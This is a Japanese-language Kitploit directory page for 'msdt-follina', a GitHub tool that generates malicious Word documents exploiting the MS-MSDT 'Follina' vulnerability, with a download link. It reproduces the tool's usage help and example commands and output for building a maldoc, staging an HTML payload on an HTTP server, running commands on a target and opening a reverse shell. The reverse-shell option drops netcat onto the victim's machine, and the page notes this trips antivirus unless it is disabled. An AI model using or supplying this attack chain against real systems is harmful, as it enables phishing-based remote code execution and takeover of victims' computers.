Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
msdt-follina — # MS-MSDT 'Follina' 悪意のあるWord文書ジェネレーター MS-MSDTの「Follina」脆弱性を悪用して、任意のコマンドを実行したり、HTTPサーバー経由でペイロードをステージングしたりする悪意のあるMicrosoft Word文書を生成します。 | Kitploit
ツール/GitHubGitHub/johnhammond/msdt-follina
エクスプロイトウェブアプリケーション悪用フィッシングコマンド&コントロールペイロード開発
GitHubjohnhammond/msdt-follina

msdt-follina

# MS-MSDT 'Follina' 悪意のあるWord文書ジェネレーター MS-MSDTの「Follina」脆弱性を悪用して、任意のコマンドを実行したり、HTTPサーバー経由でペイロードをステージングしたりする悪意のあるMicrosoft Word文書を生成します。

リポジトリを見る
1.6k370104年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

MS-MSDT「Follina」攻撃ベクター

John Hammond | 2022年5月30日


悪意のあるMicrosoft Word文書を使って「Follina」MS-MSDT攻撃を作成し、HTTPサーバーでペイロードをステージングします。

Screenshot

使用方法

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

例

calc.exeを起動:

root@kitploit:~
$ python3 follina.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

notepad.exeを起動:

root@kitploit:~
$ python3 follina.py -c "notepad"

ポート9001でリバースシェルを取得します。注意: これはnetcatバイナリを_被害者のマシン上に_ダウンロードし、C:\Windows\Tasksに配置します。バイナリのクリーンアップは行いません。AVが無効でない限り、アンチウイルス検出をトリガーします。

root@kitploit:~
$ python3 follina.py -r 9001

Reverse Shell

ツールをダウンロード